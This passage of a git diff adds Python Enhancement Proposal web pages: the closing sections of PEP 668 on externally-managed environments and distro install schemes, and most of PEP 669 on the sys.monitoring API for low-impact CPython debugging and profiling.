Create separate distro and local directories

+

Distros should place two separate paths on the system interpreter’s +sys.path, one for distro-installed packages and one for packages +installed by the local system administrator, and configure +sysconfig.get_default_scheme() to point at the latter path. This +ensures that tools like pip will not modify distro-installed packages. +The path for the local system administrator should come before the +distro path on sys.path so that local installs take preference +over distro packages.

+

For example, Fedora and Debian (and their derivatives) both implement +this split by using /usr/local for locally-installed packages and +/usr for distro-installed packages. Fedora uses +/usr/local/lib/python3.x/site-packages vs. +/usr/lib/python3.x/site-packages. (Debian uses +/usr/local/lib/python3/dist-packages vs. +/usr/lib/python3/dist-packages as an additional layer of +separation from a locally-compiled Python interpreter: if you build +and install upstream CPython in /usr/local/bin, it will look at +/usr/local/lib/python3/site-packages, and Debian wishes to make +sure that packages installed via the locally-built interpreter don’t +show up on sys.path for the distro interpreter.)

+

Note that the /usr/local vs. /usr split is analogous to how +the PATH environment variable typically includes +/usr/local/bin:/usr/bin and non-distro software installs to +/usr/local by default. This split is recommended by the +Filesystem Hierarchy Standard.

+

There are two ways you could do this. One is, if you are building and +packaging Python libraries directly (e.g., your packaging helpers +unpack a PEP 517-built wheel or call setup.py install), arrange +for those tools to use a directory that is not in a sysconfig +scheme but is still on sys.path.

+

The other is to arrange for the default sysconfig scheme to change +when running inside a package build versus when running on an +installed system. The sysconfig customization hooks from +bpo-43976 should make this easy (once accepted and implemented): +make your packaging tool set an +environment variable or some other detectable configuration, and +define a get_preferred_schemes function to return a different +scheme when called from inside a package build. Then you can use pip +install as part of your distro packaging.
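A sketch of such a hook under the bpo-43976 mechanism; the environment variable DISTRO_PKG_BUILD is an invented placeholder, and posix_local is a hypothetical admin-owned scheme name (posix_distro is the distro-owned scheme name used in the examples below):

import os

def get_preferred_schemes():
    # Hypothetical: the distro's packaging helpers export DISTRO_PKG_BUILD
    # during package builds, so pip install targets the distro scheme there.
    if os.environ.get("DISTRO_PKG_BUILD"):
        prefix_scheme = "posix_distro"
    else:
        prefix_scheme = "posix_local"
    return {"prefix": prefix_scheme, "home": "posix_home", "user": "posix_user"}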

+

We propose adding a --scheme=... option to instruct pip to run +against a specific scheme. (See Implementation Notes below for how +pip currently determines schemes.) Once that’s available, for local +testing and possibly for actual packaging, you would be able to run +something like pip install --scheme=posix_distro to explicitly +install a package into your distro’s location (bypassing +get_preferred_schemes). One could also, if absolutely needed, use +pip uninstall --scheme=posix_distro to use pip to remove packages +from the system-managed directory, which addresses the (hopefully +theoretical) regression in use case 5 in Rationale.

+

To install packages with pip, you would also need to either suppress the EXTERNALLY-MANAGED marker file to allow pip to run or override it on the command line. You may want to use the same means for suppressing the marker file in build chroots as you do in container images.

+

The advantage of setting these up to be automatic (suppressing the +marker file in your build environment and having +get_preferred_schemes automatically return your distro’s scheme) +is that an unadorned pip install will work inside a package build, +which generally means that an unmodified upstream build script that +happens to internally call pip install will do the right thing. +You can, of course, just ensure that your packaging process always +calls pip install --scheme=posix_distro --break-system-packages, +which would work too.

+

The best approach here depends a lot on your distro’s conventions and +mechanisms for packaging.

+

Similarly, the sysconfig paths that are not for importable Python +code - that is, include, platinclude, scripts, and +data - should also have two variants, one for use by +distro-packaged software and one for use for locally-installed +software, and the distro should be set up such that both are usable. +For instance, a typical FHS-compliant distro will use +/usr/local/include for the default scheme’s include and +/usr/include for distro-packaged headers and place both on the +compiler’s search path, and it will use /usr/local/bin for the +default scheme’s scripts and /usr/bin for distro-packaged +entry points and place both on $PATH.

+
+
+
+

Backwards Compatibility

+

All of these mechanisms are proposed for new distro releases and new +versions of tools like pip only.

+

In particular, we strongly recommend that distros with a concept of +major versions only add the marker file or change sysconfig +schemes in a new major version; otherwise there is a risk that, on an +existing system, software installed via a Python-specific package +manager now becomes unmanageable (without an override option). For a +rolling-release distro, if possible, only add the marker file or +change sysconfig schemes in a new Python minor version.

+

One particular backwards-compatibility difficulty for package +installation tools is likely to be managing environments created by +old versions of virtualenv which have the latest version of the +tool installed. A “virtual environment” now has a fairly precise +definition: it uses the pyvenv.cfg mechanism, which causes +sys.base_prefix != sys.prefix. It is possible, however, that a +user may have an old virtual environment created by an older version +of virtualenv; as of this writing, pip supports Python 3.6 +onwards, which is in turn supported by virtualenv 15.1.0 onwards, +so this scenario is possible. In older versions of virtualenv, the +mechanism is instead to set a new attribute, sys.real_prefix, and +it does not use the standard library support for virtual environments, +so sys.base_prefix is the same as sys.prefix. So the logic for +robustly detecting a virtual environment is something like:

+
import sys

def is_virtual_environment():
    # Stdlib venvs set sys.base_prefix != sys.prefix; old virtualenv
    # versions set sys.real_prefix instead.
    return sys.base_prefix != sys.prefix or hasattr(sys, "real_prefix")
+
+
+
+
+

Security Implications

+

The purpose of this feature is not to implement a security boundary; +it is to discourage well-intended changes from unexpectedly breaking a +user’s environment. That is to say, the reason this PEP restricts +pip install outside a virtual environment is not that it’s a +security risk to be able to do so; it’s that “There should be one– +and preferably only one –obvious way to do it,” and that way should +be using a virtual environment. pip install outside a virtual +environment is rather too obvious for what is almost always the wrong +way to do it.

+

If there is a case where a user should not be able to sudo pip +install or pip install --user and add files to sys.path for +security reasons, that needs to be implemented either via access +control rules on what files the user can write to or an explicitly +secured sys.path for the program in question. Neither of the +mechanisms in this PEP should be interpreted as a way to address such +a scenario.

+

For those reasons, an attempted install with a marker file present is +not a security incident, and there is no need to raise an auditing +event for it. If the calling user legitimately has access to sudo +pip install or pip install --user, they can accomplish the same +installation entirely outside of Python; if they do not legitimately +have such access, that’s a problem outside the scope of this PEP.

+

The marker file itself is located in the standard library directory, +which is a trusted location (i.e., anyone who can write to the marker +file used by a particular installer could, presumably, run arbitrary +code inside the installer). Therefore, there is generally no need to +filter out terminal escape sequences or other potentially-malicious +content in the error message.

+
+
+

Alternatives

+

There are a number of similar proposals we considered that this PEP +rejects or defers, largely to preserve the behavior in the +case-by-case analysis in Rationale.

+
+

Marker file

+

Should the marker file be in sys.path, marking a particular directory as not to be written to by a Python-specific package manager? This would help with the second problem addressed by this PEP (not overwriting or deleting distro-owned files) but not the first (incompatible installs). A directory-specific marker in /usr/lib/python3.x/site-packages would not discourage installations into either /usr/local/lib/python3.x/site-packages or ~/.local/lib/python3.x/site-packages, both of which are on sys.path for /usr/bin/python3. In other words, the marker file should not be interpreted as marking a single directory as externally managed (even though it happens to be in a directory on sys.path); it marks the entire Python installation as externally managed.

+

Another variant of the above: should the marker file be in sys.path, where if it can be found in any directory in sys.path, it marks the installation as externally managed? An apparent advantage of this approach is that it automatically disables itself in virtual environments. Unfortunately, this has the wrong behavior with a --system-site-packages virtual environment, where the system-wide sys.path is visible but package installations are allowed. (It could work if the rule of exempting virtual environments is preserved, but that seems to have no advantage over the current scheme.)

+

Should the marker just be a new attribute of a sysconfig scheme? +There is some conceptual cleanliness to this, except that it’s hard to +override. We want to make it easy for container images, package build +environments, etc. to suppress the marker file. A file that you can +remove is easy; code in sysconfig is much harder to modify.

+

Should the file be in /etc? No, because again, it refers to a +specific Python installation. A user who installs their own Python may +well want to install packages within the global context of that +interpreter.

+

Should the configuration setting be in pip.conf or +distutils.cfg? Apart from the above objections about marking an +installation, this mechanism isn’t specific to either of those tools. +(It seems reasonable for pip to also implement a configuration flag +for users to prevent themselves from performing accidental +non-virtual-environment installs in any Python installation, but that +is outside the scope of this PEP.)

+

Should the file be TOML? TOML is gaining popularity for packaging (see +e.g. PEP 517) but does not yet have an implementation in the standard +library. Strictly speaking, this isn’t a blocker - distros need only +write the file, not read it, so they don’t need a TOML library (the +file will probably be written by hand, regardless of format), and +packaging tools likely have a TOML reader already. However, the INI +format is currently used for various other forms of packaging metadata +(e.g., pydistutils.cfg and setup.cfg), meets our needs, and is +parsable by the standard library, and the pip maintainers expressed a +preference to avoid using TOML for this yet.

+

Should the file be email.message-style? While this format is also +used for packaging metadata (e.g. sdist and wheel metadata) and is +also parsable by the standard library, it doesn’t handle multi-line +entries quite as clearly, and that is our primary use case.

+

Should the marker file be executable Python code that evaluates +whether installation should be allowed or not? Apart from the concerns +above about having the file in sys.path, we have a concern that +making it executable is committing to too powerful of an API and risks +making behavior harder to understand. (Note that the +get_default_scheme hook of bpo-43976 is in fact executable, but +that code needs to be supplied when the interpreter builds; it isn’t +intended to be supplied post-build.)

+

When overriding the marker, should a Python-specific package manager +be disallowed from shadowing a package installed by the external +package manager (i.e., installing modules of the same name)? This +would minimize the risk of breaking system software, but it’s not +clear it’s worth the additional user experience complexity. There are +legitimate use cases for shadowing system packages, and an additional +command-line option to permit it would be more confusing. Meanwhile, +not passing that option wouldn’t eliminate the risk of breaking system +software, which may be relying on a try: import xyz failing, +finding a limited set of entry points, etc. Communicating this +distinction seems difficult. We think it’s a good idea for +Python-specific package managers to print a warning if they shadow a +package, but we think it’s not worth disabling it by default.

+

Why not use the INSTALLER file from PEP 376 to determine who +installed a package and whether it can be removed? First, it’s +specific to a particular package (it’s in the package’s dist-info +directory), so like some of the alternatives above, it doesn’t provide +information on an entire environment and whether package installations +are permissible. PEP 627 also updates PEP 376 to prevent programmatic +use of INSTALLER, specifying that the file is “to be used for +informational purposes only. […] Our goal is supporting +interoperating tools, and basing any action on which tool happened to +install a package runs counter to that goal.” Finally, as PEP 627 +envisions, there are legitimate use cases for one tool knowing how to +handle packages installed by another tool; for instance, conda can +safely remove a package installed by pip into a Conda environment.

+

Why does the specification give no means for disabling package +installations inside a virtual environment? We can’t see a +particularly strong use case for it (at least not one related to the +purposes of this PEP). If you need it, it’s simple enough to pip +uninstall pip inside that environment, which should discourage at +least unintentional changes to the environment (and this specification +makes no provision to disable intentional changes, since after all +the marker file can be easily removed).

+
+
+

System Python

+

Shouldn’t distro software just run with the distro site-packages directory alone on sys.path and ignore the local system administrator’s site-packages as well as the user-specific one? This is a worthwhile idea, and various versions of it have been circulating for a while under the name of “system Python” or “platform Python” (with a separate “user Python” for end users writing Python or installing Python software separate from the system). However, it is a much more involved change. First, it would be a backwards-incompatible change. As mentioned in the Motivation section, there are valid use cases for running distro-installed Python applications like Sphinx or Ansible with locally-installed Python libraries available on their sys.path. A wholesale switch to ignoring local packages would break these use cases, and a distro would have to make a case-by-case analysis of whether an application ought to see locally-installed libraries or not.

+

Furthermore, Fedora attempted this change and reverted it, finding, +ironically, that their implementation of the change broke their +package manager. Given that experience, there are clearly details to +be worked out before distros can reliably implement that approach, and +a PEP recommending it would be premature.

+

This PEP is intended to be a complete and self-contained change that +is independent of a distributor’s decision for or against “system +Python” or similar proposals. It is not incompatible with a distro +implementing “system Python” in the future, and even though both +proposals address the same class of problems, there are still +arguments in favor of implementing something like “system Python” even +after implementing this PEP. At the same time, though, this PEP +specifically tries to make a more targeted and minimal change, such +that it can be implemented by distributors who don’t expect to adopt +“system Python” (or don’t expect to implement it immediately). The +changes in this PEP stand on their own merits and are not an +intermediate step for some future proposal. This PEP reduces (but does +not eliminate) the risk of breaking system software while minimizing +(but not completely avoiding) breaking changes, which should therefore +be much easier to implement than the full “system Python” idea, which +comes with the downsides mentioned above.

+

We expect that the guidance in this PEP - that users should use +virtual environments whenever possible and that distros should have +separate sys.path directories for distro-managed and +locally-managed modules - should make further experiments easier in +the future. These may include distributing wholly separate “system” +and “user” Python interpreters, running system software out of a +distro-owned virtual environment or PYTHONHOME (but shipping a +single interpreter), or modifying the entry points for certain +software (such as the distro’s package manager) to use a sys.path +that only sees distro-managed directories. Those ideas themselves, +however, remain outside the scope of this PEP.

+
+
+
+

Implementation Notes

+

This section is non-normative and contains notes relevant to both the +specification and potential implementations.

+

Currently, pip does not directly expose a way to choose a target +sysconfig scheme, but it has three ways of looking up schemes when +installing:

+
+
pip install
Calls sysconfig.get_default_scheme(), which is usually (in +upstream CPython and most current distros) the same as +get_preferred_scheme('prefix').
+
pip install --prefix=/some/path
Calls sysconfig.get_preferred_scheme('prefix').
+
pip install --user
Calls sysconfig.get_preferred_scheme('user').
+
+

Finally, pip install --target=/some/path writes directly to +/some/path without looking up any schemes.

+

Debian currently carries a patch to change the default install +location inside a virtual environment, using a few heuristics +(including checking for the VIRTUAL_ENV environment variable), +largely so that the directory used in a virtual environment remains +site-packages and not dist-packages. This does not +particularly affect this proposal, because the implementation of that +patch does not actually change the default sysconfig scheme, and +notably does not change the result of +sysconfig.get_path("stdlib").

+

Fedora currently carries a patch to change the default install +location when not running inside rpmbuild, which they use to +implement the two-system-wide-directories approach. This is +conceptually the sort of hook envisioned by bpo-43976, except +implemented as a code patch to distutils instead of as a changed +sysconfig scheme.

+

The implementation of is_virtual_environment above, as well as the +logic to load the EXTERNALLY-MANAGED file and find the error +message from it, may as well get added to the standard library +(sys and sysconfig, respectively), to centralize their +implementations, but they don’t need to be added yet.

+
+
+

References

+

For additional background on these problems and previous attempts to +solve them, see Debian bug 771794 “pip silently removes/updates +system provided python packages” from 2014, Fedora’s 2018 article +Making sudo pip safe about pointing sudo pip at /usr/local +(which acknowledges that the changes still do not make sudo pip +completely safe), pip issues 5605 (“Disable upgrades to existing +python modules which were not installed via pip”) and 5722 (“pip +should respect /usr/local”) from 2018, and the post-PyCon US 2019 +discussion thread Playing nice with external package managers.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0668.rst

+

Last modified: 2024-05-17 01:32:43 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0669/index.html b/pep-0669/index.html
new file mode 100644
index 00000000000..ffda7f6642d
--- /dev/null
+++ b/pep-0669/index.html
@@ -0,0 +1,742 @@
PEP 669 – Low Impact Monitoring for CPython | peps.python.org
+
+

+
+
+

PEP 669 – Low Impact Monitoring for CPython

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Aug-2021
+
Python-Version:
+
3.12
+
Post-History:
+
07-Dec-2021, +10-Jan-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at sys.monitoring.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Using a profiler or debugger in CPython can have a severe impact on +performance. Slowdowns by an order of magnitude are common.

+

This PEP proposes an API for monitoring Python programs running +on CPython that will enable monitoring at low cost.

+

Although this PEP does not specify an implementation, it is expected that +it will be implemented using the quickening step of +PEP 659.

+

A sys.monitoring namespace will be added, which will contain +the relevant functions and constants.

+
+
+

Motivation

+

Developers should not have to pay an unreasonable cost to use debuggers, +profilers and other similar tools.

+

C++ and Java developers expect to be able to run a program at full speed +(or very close to it) under a debugger. +Python developers should expect that too.

+
+
+

Rationale

+

The quickening mechanism provided by PEP 659 provides a way to dynamically modify executing Python bytecode. These modifications have little cost beyond the parts of the code that are modified, and a relatively low cost to those parts that are modified. We can leverage this to provide an efficient mechanism for monitoring that was not possible in 3.10 or earlier.

+

By using quickening, we expect that code run under a debugger on 3.12 +should outperform code run without a debugger on 3.11. +Profiling will still slow down execution, but by much less than in 3.11.

+
+
+

Specification

+

Monitoring of Python programs is done by registering callback functions +for events and by activating a set of events.

+

Activating events and registering callback functions are independent of each other.

+

Both registering callbacks and activating events are done on a per-tool basis. +It is possible to have multiple tools that respond to different sets of events.

+

Note that, unlike sys.settrace(), events and callbacks are per interpreter, not per thread.

+
+

Events

+

As a code object executes, various events occur that might be of interest to tools. By activating events and by registering callback functions, tools can respond to these events in any way that suits them. Events can be set globally, or for individual code objects.

+

For 3.12, CPython will support the following events:

+
  • PY_START: Start of a Python function (occurs immediately after the call, the callee’s frame will be on the stack)
  • PY_RESUME: Resumption of a Python function (for generator and coroutine functions), except for throw() calls.
  • PY_THROW: A Python function is resumed by a throw() call.
  • PY_RETURN: Return from a Python function (occurs immediately before the return, the callee’s frame will be on the stack).
  • PY_YIELD: Yield from a Python function (occurs immediately before the yield, the callee’s frame will be on the stack).
  • PY_UNWIND: Exit from a Python function during exception unwinding.
  • CALL: A call in Python code (event occurs before the call).
  • C_RETURN: Return from any callable, except Python functions (event occurs after the return).
  • C_RAISE: Exception raised from any callable, except Python functions (event occurs after the exit).
  • RAISE: An exception is raised, except those that cause a STOP_ITERATION event.
  • EXCEPTION_HANDLED: An exception is handled.
  • LINE: An instruction is about to be executed that has a different line number from the preceding instruction.
  • INSTRUCTION: A VM instruction is about to be executed.
  • JUMP: An unconditional jump in the control flow graph is made.
  • BRANCH: A conditional branch is taken (or not).
  • STOP_ITERATION: An artificial StopIteration is raised; see the STOP_ITERATION event.
+

More events may be added in the future.

+

All events will be attributes of the events namespace in sys.monitoring. All events will be represented by a power-of-two integer, so that they can be combined with the | operator.
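For example (requires Python 3.12, where sys.monitoring exists):

import sys

events = sys.monitoring.events
wanted = events.PY_START | events.PY_RETURN | events.RAISE
assert wanted & events.PY_RETURN  # membership test via bitwise AND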

+

Events are divided into three groups:

+
+

Local events

+

Local events are associated with normal execution of the program and happen +at clearly defined locations. All local events can be disabled. +The local events are:

+
  • PY_START
  • PY_RESUME
  • PY_RETURN
  • PY_YIELD
  • CALL
  • LINE
  • INSTRUCTION
  • JUMP
  • BRANCH
  • STOP_ITERATION
+
+
+

Ancillary events

+

Ancillary events can be monitored like other events, but are controlled +by another event:

+
  • C_RAISE
  • C_RETURN
+

The C_RETURN and C_RAISE events are controlled by the CALL event. C_RETURN and C_RAISE events will only be seen if the corresponding CALL event is being monitored.

+
+
+

Other events

+

Other events are not necessarily tied to a specific location in the +program and cannot be individually disabled.

+

The other events that can be monitored are:

+
  • PY_THROW
  • PY_UNWIND
  • RAISE
  • EXCEPTION_HANDLED
+
+
+

The STOP_ITERATION event

+

PEP 380 +specifies that a StopIteration exception is raised when returning a value +from a generator or coroutine. However, this is a very inefficient way to +return a value, so some Python implementations, notably CPython 3.12+, do not +raise an exception unless it would be visible to other code.

+

To allow tools to monitor for real exceptions without slowing down generators +and coroutines, the STOP_ITERATION event is provided. +STOP_ITERATION can be locally disabled, unlike RAISE.

+
+
+
+

Tool identifiers

+

The VM can support up to 6 tools at once. +Before registering or activating events, a tool should choose an identifier. +Identifiers are integers in the range 0 to 5.

+
sys.monitoring.use_tool_id(id, name:str) -> None
+sys.monitoring.free_tool_id(id) -> None
+sys.monitoring.get_tool(id) ->  str | None
+
+
+

sys.monitoring.use_tool_id raises a ValueError if id is in use. +sys.monitoring.get_tool returns the name of the tool if id is in use, +otherwise it returns None.

+

All IDs are treated the same by the VM with regard to events, but the +following IDs are pre-defined to make co-operation of tools easier:

+
sys.monitoring.DEBUGGER_ID = 0
+sys.monitoring.COVERAGE_ID = 1
+sys.monitoring.PROFILER_ID = 2
+sys.monitoring.OPTIMIZER_ID = 5
+
+
+

There is no obligation to set an ID, nor is there anything preventing a tool from using an ID even if it is already in use. However, tools are encouraged to use a unique ID and respect other tools.

+

For example, if a debugger were attached and DEBUGGER_ID were in use, it +should report an error, rather than carrying on regardless.
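A sketch of that co-operative check:

import sys

mon = sys.monitoring
current = mon.get_tool(mon.DEBUGGER_ID)
if current is not None:
    # Another debugger is attached; report rather than clobbering it.
    raise RuntimeError(f"debugger ID already claimed by {current!r}")
mon.use_tool_id(mon.DEBUGGER_ID, "my-debugger")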

+

The OPTIMIZER_ID is provided for tools like Cinder or PyTorch +that want to optimize Python code, but need to decide what to +optimize in a way that depends on some wider context.

+
+
+

Setting events globally

+

Events can be controlled globally by modifying the set of events being monitored:

+
  • sys.monitoring.get_events(tool_id: int) -> int
    Returns the int representing all the active events.
  • sys.monitoring.set_events(tool_id: int, event_set: int)
    Activates all events which are set in event_set. Raises a ValueError if tool_id is not in use.
+

No events are active by default.
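A minimal sketch of activating events for a tool (Python 3.12; the tool name “toy-profiler” is illustrative):

import sys

mon = sys.monitoring
mon.use_tool_id(mon.PROFILER_ID, "toy-profiler")
# Activate function entry/exit events globally for this tool:
mon.set_events(mon.PROFILER_ID, mon.events.PY_START | mon.events.PY_RETURN)
assert mon.get_events(mon.PROFILER_ID) == (
    mon.events.PY_START | mon.events.PY_RETURN)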

+
+
+

Per code object events

+

Events can also be controlled on a per code object basis:

+
  • sys.monitoring.get_local_events(tool_id: int, code: CodeType) -> int
    Returns all the local events for code.
  • sys.monitoring.set_local_events(tool_id: int, code: CodeType, event_set: int)
    Activates all the local events for code which are set in event_set. Raises a ValueError if tool_id is not in use.
+

Local events add to global events, but do not mask them. +In other words, all global events will trigger for a code object, +regardless of the local events.

+
+
+

Register callback functions

+

To register a callable for events call:

+
sys.monitoring.register_callback(tool_id:int, event: int, func: Callable | None) -> Callable | None
+
+
+

If another callback was registered for the given tool_id and event, +it is unregistered and returned. +Otherwise register_callback returns None.

+

Functions can be unregistered by calling +sys.monitoring.register_callback(tool_id, event, None).

+

Callback functions can be registered and unregistered at any time.
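For example, a minimal sketch (Python 3.12; the tool name is illustrative):

import sys

mon = sys.monitoring
mon.use_tool_id(mon.DEBUGGER_ID, "toy-tracer")

def on_py_start(code, instruction_offset):
    print(f"entering {code.co_qualname} (offset {instruction_offset})")

# register_callback returns the previously registered callback, or None.
assert mon.register_callback(
    mon.DEBUGGER_ID, mon.events.PY_START, on_py_start) is None
mon.set_events(mon.DEBUGGER_ID, mon.events.PY_START)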

+

Registering or unregistering a callback function will generate a sys.audit event.

+
+

Callback function arguments

+

When an active event occurs, the registered callback function is called. +Different events will provide the callback function with different arguments, as follows:

+
  • PY_START and PY_RESUME:
    func(code: CodeType, instruction_offset: int) -> DISABLE | Any
  • PY_RETURN and PY_YIELD:
    func(code: CodeType, instruction_offset: int, retval: object) -> DISABLE | Any
  • CALL, C_RAISE and C_RETURN:
    func(code: CodeType, instruction_offset: int, callable: object, arg0: object | MISSING) -> DISABLE | Any
    If there are no arguments, arg0 is set to MISSING.
  • RAISE and EXCEPTION_HANDLED:
    func(code: CodeType, instruction_offset: int, exception: BaseException) -> DISABLE | Any
  • LINE:
    func(code: CodeType, line_number: int) -> DISABLE | Any
  • BRANCH:
    func(code: CodeType, instruction_offset: int, destination_offset: int) -> DISABLE | Any
    Note that the destination_offset is where the code will next execute. For an untaken branch this will be the offset of the instruction following the branch.
  • INSTRUCTION:
    func(code: CodeType, instruction_offset: int) -> DISABLE | Any
+

If a callback function returns DISABLE, then that function will no longer be called for that (code, instruction_offset) until sys.monitoring.restart_events() is called. This feature is provided for coverage and other tools that are only interested in seeing an event once.

+
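For instance, a line-coverage callback could record each line once and then switch itself off for that location (a sketch, not part of the PEP; it assumes the COVERAGE_ID slot and the events namespace noted earlier):

import sys

seen = set()

def on_line(code, line_number):
    seen.add((code.co_filename, line_number))
    # Each line only needs to be recorded once, so disable this location.
    return sys.monitoring.DISABLE

# (The LINE event must also be activated, as shown earlier.)
sys.monitoring.register_callback(sys.monitoring.COVERAGE_ID,
                                 sys.monitoring.events.LINE, on_line)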

Note that sys.monitoring.restart_events() is not specific to one tool, +so tools must be prepared to receive events that they have chosen to DISABLE.

+
+
+
+

Events in callback functions

+

Events are suspended in callback functions and their callees for the tool +that registered that callback.

+

That means that other tools will see events occurring in the callback functions +of other tools. This could be useful for debugging a profiling tool, but would produce +misleading profiles, as the debugger tool would show up in the profile.

+
+
+

Order of events

+

If an instruction triggers several events, they occur in the following order:

+
    +
  • LINE
  • +
  • INSTRUCTION
  • +
  • All other events (only one of these events can occur per instruction)
  • +
+

Each event is delivered to tools in ascending order of ID.

+
+
+

The “call” event group

+

Most events are independent; setting or disabling one event has no effect on the others. +However, the CALL, C_RAISE and C_RETURN events form a group. +If any of those events are set or disabled, then all events in the group are. +Disabling a CALL event will not disable the matching C_RAISE or C_RETURN, +but will disable all subsequent events.

+
+
+

Attributes of the sys.monitoring namespace

+
    +
  • def use_tool_id(id)->None
  • +
  • def free_tool_id(id)->None
  • +
  • def get_events(tool_id: int)->int
  • +
  • def set_events(tool_id: int, event_set: int)->None
  • +
  • def get_local_events(tool_id: int, code: CodeType)->int
  • +
  • def set_local_events(tool_id: int, code: CodeType, event_set: int)->None
  • +
  • def register_callback(tool_id: int, event: int, func: Callable)->Optional[Callable]
  • +
  • def restart_events()->None
  • +
  • DISABLE: object
  • +
  • MISSING: object
  • +
+
+
+

Access to “debug only” features

+

Some features of the standard library are not accessible to normal code, +but are accessible to debuggers. For example, setting local variables or +the line number.

+

These features will be available to callback functions.

+
+
+
+

Backwards Compatibility

+

This PEP is mostly backwards compatible.

+

There are some compatibility issues with PEP 523, as the behavior +of PEP 523 plugins is outside of the VM’s control. +It is up to PEP 523 plugins to ensure that they respect the semantics +of this PEP. Simple plugins that do not change the state of the VM, and +defer execution to _PyEval_EvalFrameDefault() should continue to work.

+

sys.settrace() and sys.setprofile() will act as if they were tools +6 and 7 respectively, so can be used alongside this PEP.

+

This means that sys.settrace() and sys.setprofile() may not work +correctly with all PEP 523 plugins. Although, simple PEP 523 +plugins, as described above, should be fine.

+
+

Performance

+

If no events are active, this PEP should have a small positive impact on +performance. Experiments show between 1 and 2% speedup from not supporting +sys.settrace() directly.

+

The performance of sys.settrace() will be about the same. +The performance of sys.setprofile() should be better. +However, tools relying on sys.settrace() and +sys.setprofile() can be made a lot faster by using the +API provided by this PEP.

+

If a small set of events is active, e.g. for a debugger, then the overhead +of callbacks will be orders of magnitude less than for sys.settrace() +and much cheaper than using PEP 523.

+

Coverage tools can be implemented at very low cost, +by returning DISABLE in all callbacks.

+

For heavily instrumented code, e.g. using LINE, performance should be +better than sys.settrace(), but not by much, as performance will be +dominated by the time spent in callbacks.

+

For optimizing virtual machines, such as future versions of CPython +(and PyPy should they choose to support this API), changes to the set of +active events in the midst of a long-running program could be quite +expensive, possibly taking hundreds of milliseconds as it triggers +de-optimizations. Once such de-optimization has occurred, performance should +recover as the VM can re-optimize the instrumented code.

+

In general these operations can be considered to be fast:

+
    +
  • def get_events(tool_id: int)->int
  • +
  • def get_local_events(tool_id: int, code: CodeType)->int
  • +
  • def register_callback(tool_id: int, event: int, func: Callable)->Optional[Callable]
  • +
  • def get_tool(tool_id) -> str | None
  • +
+

These operations are slower, but not especially so:

+
    +
  • def set_local_events(tool_id: int, code: CodeType, event_set: int)->None
  • +
+

And these operations should be regarded as slow:

+
    +
  • def use_tool_id(id, name:str)->None
  • +
  • def free_tool_id(id)->None
  • +
  • def set_events(tool_id: int, event_set: int)->None
  • +
  • def restart_events()->None
  • +
+

How slow the slow operations are depends on when they happen. +If done early in the program, before modules are loaded, +they should be fairly inexpensive.

+
+

Memory Consumption

+

When not in use, this PEP will have a negligible impact on memory consumption.

+

How memory is used is very much an implementation detail. +However, we expect that for 3.12 the additional memory consumption per +code object will be roughly as follows:

                 Events
Tools            Others      LINE        INSTRUCTION
One              None        ≈40%        ≈80%
Two or more      ≈40%        ≈120%       ≈200%
+
+
+
+
+

Security Implications

+

Allowing modification of running code has some security implications, +but no more than the ability to generate and call new code.

+

All the new functions listed above will trigger audit hooks.

+
+
+

Implementation

+

This outlines the proposed implementation for CPython 3.12. The actual +implementation for later versions of CPython and other Python implementations +may differ considerably.

+

The proposed implementation of this PEP will be built on top of the quickening +step of CPython 3.11, as described in PEP 659. +Instrumentation works in much the same way as quickening: bytecodes are +replaced with instrumented ones as needed.

+

For example, if the CALL event is turned on, +then all call instructions will be +replaced with an INSTRUMENTED_CALL instruction.

+

Note that this will interfere with specialization, which will result in some +performance degradation in addition to the overhead of calling the +registered callable.

+

When the set of active events changes, the VM will immediately update +all code objects present on the call stack of any thread. It will also set in +place traps to ensure that all code objects are correctly instrumented when +called. Consequently changing the set of active events should be done as +infrequently as possible, as it could be quite an expensive operation.

+

Other events, such as RAISE, can be turned on or off cheaply, +as they do not rely on code instrumentation, but on runtime checks when the +underlying event occurs.

+

The exact set of events that require instrumentation is an implementation detail, +but for the current design, the following events will require instrumentation:

+
    +
  • PY_START
  • +
  • PY_RESUME
  • +
  • PY_RETURN
  • +
  • PY_YIELD
  • +
  • CALL
  • +
  • LINE
  • +
  • INSTRUCTION
  • +
  • JUMP
  • +
  • BRANCH
  • +
+

Each instrumented bytecode will require an additional 8 bits of information to +note which tool the instrumentation applies to. +LINE and INSTRUCTION events require additional information, as they +need to store the original instruction, or even the instrumented instruction +if they overlap other instrumentation.

+
+
+

Implementing tools

+

It is the philosophy of this PEP that it should be possible for third-party monitoring +tools to achieve high performance, not that it should be easy for them to do so.

+

Converting events into data that is meaningful to the users is +the responsibility of the tool.

+

All events have a cost, and tools should attempt to use the set of events +that triggers the least often while still providing the necessary information.

+
+

Debuggers

+
+

Inserting breakpoints

+

Breakpoints can be inserted by setting per code object events, either LINE or INSTRUCTION, +and returning DISABLE for any events not matching a breakpoint.

+
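A hedged sketch of LINE-based breakpoints follows; break_here is a hypothetical hook into the debugger's user interface, and the breakpoint table is made up for the example:

import sys

DEBUGGER = sys.monitoring.DEBUGGER_ID
breakpoints = {("example.py", 17)}  # hypothetical breakpoint table

def on_line(code, line_number):
    if (code.co_filename, line_number) in breakpoints:
        break_here(code, line_number)  # hypothetical: hand control to the user
        return None
    return sys.monitoring.DISABLE  # not a breakpoint; never fire here again

sys.monitoring.register_callback(DEBUGGER, sys.monitoring.events.LINE, on_line)
# LINE would then be activated locally, per code object containing a breakpoint:
#   sys.monitoring.set_local_events(DEBUGGER, code, sys.monitoring.events.LINE)

Because DISABLE applies per location, a real debugger would also call sys.monitoring.restart_events() whenever the breakpoint set changes.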
+
+

Stepping

+

Debuggers usually offer the ability to step execution by a +single instruction or line.

+

Like breakpoints, stepping can be implemented by setting per code object events. +As soon as normal execution is to be resumed, the local events can be unset.

+
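A sketch of line stepping under the same assumptions:

import sys

DEBUGGER = sys.monitoring.DEBUGGER_ID

def start_stepping(code):
    # Fire on every line of this code object while the user is stepping.
    sys.monitoring.set_local_events(DEBUGGER, code,
                                    sys.monitoring.events.LINE)

def stop_stepping(code):
    # Normal execution resumes: clear the local events again.
    sys.monitoring.set_local_events(DEBUGGER, code, 0)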
+
+

Attaching

+

